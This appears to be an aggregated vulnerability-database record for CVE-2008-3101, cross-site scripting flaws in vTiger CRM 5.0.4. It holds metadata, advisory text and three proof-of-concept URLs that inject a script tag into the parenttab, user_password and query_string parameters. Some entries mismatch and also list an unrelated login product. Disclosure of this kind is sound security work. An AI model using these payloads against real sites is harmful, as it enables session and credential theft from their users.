ID

VAR-E-200809-0436


CVE

cve_id:CVE-2008-3101

Trust: 2.7

sources: BID: 30951 // BID: 31055 // PACKETSTORM: 69548 // EXPLOIT-DB: 32307 // EDBNET: 53849

EDB ID

32307


TITLE

vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 32307

DESCRIPTION

vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities. CVE-2008-3101CVE-47865 . webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 32307

AFFECTED PRODUCTS

vendor:vtigermodel:crmscope:eqversion:5.0.4

Trust: 1.9

vendor:hypersilencemodel:silentum loginsysscope:eqversion:1.0

Trust: 0.3

sources: BID: 30951 // BID: 31055 // EXPLOIT-DB: 32307 // EDBNET: 53849

EXPLOIT

source: https://www.securityfocus.com/bid/30951/info

vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

vtiger CRM 5.0.4 is vulnerable; other versions may also be affected.

http://www.example.com/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script>

Trust: 1.0

sources: EXPLOIT-DB: 32307

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 32307

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 32307

TYPE

Multiple Cross-Site Scripting Vulnerabilities

Trust: 1.6

sources: EXPLOIT-DB: 32307 // EDBNET: 53849

TAGS

tag:exploit

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 69548

CREDITS

Fabian Fingerle

Trust: 0.6

sources: EXPLOIT-DB: 32307

EXTERNAL IDS

db:NVDid:CVE-2008-3101

Trust: 3.3

db:BIDid:30951

Trust: 1.9

db:EXPLOIT-DBid:32307

Trust: 1.6

db:EDBNETid:70477

Trust: 0.6

db:EDBNETid:53849

Trust: 0.6

db:PACKETSTORMid:69548

Trust: 0.5

db:BIDid:31055

Trust: 0.3

sources: BID: 30951 // BID: 31055 // PACKETSTORM: 69548 // EXPLOIT-DB: 32307 // EDBNET: 70477 // EDBNET: 53849

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2008-3101

Trust: 2.1

url:https://www.securityfocus.com/bid/30951/info

Trust: 1.0

url:https://www.intelligentexploit.com

Trust: 0.6

url:https://www.exploit-db.com/exploits/32307/

Trust: 0.6

url:http://www.vtiger.de/vtiger-crm/downloads/patches.html?tx_abdownloads_pi1[action]=getviewdetailsfordownload&tx_abdownloads_pi1[uid]=128&tx_abdownloads_pi1[category_uid]=5&chash=e16be773a5

Trust: 0.3

url:http://hypersilence.net/silentum_loginsys.php

Trust: 0.3

sources: BID: 30951 // BID: 31055 // PACKETSTORM: 69548 // EXPLOIT-DB: 32307 // EDBNET: 70477 // EDBNET: 53849

SOURCES

db:BIDid:30951
db:BIDid:31055
db:PACKETSTORMid:69548
db:EXPLOIT-DBid:32307
db:EDBNETid:70477
db:EDBNETid:53849

LAST UPDATE DATE

2022-07-27T09:50:41.853000+00:00


SOURCES UPDATE DATE

db:BIDid:30951date:2008-09-01T00:00:00
db:BIDid:31055date:2008-09-09T17:11:00

SOURCES RELEASE DATE

db:BIDid:30951date:2008-09-01T00:00:00
db:BIDid:31055date:2008-09-06T00:00:00
db:PACKETSTORMid:69548date:2008-09-03T02:42:07
db:EXPLOIT-DBid:32307date:2008-09-01T00:00:00
db:EDBNETid:70477date:2008-09-02T00:00:00
db:EDBNETid:53849date:2008-09-01T00:00:00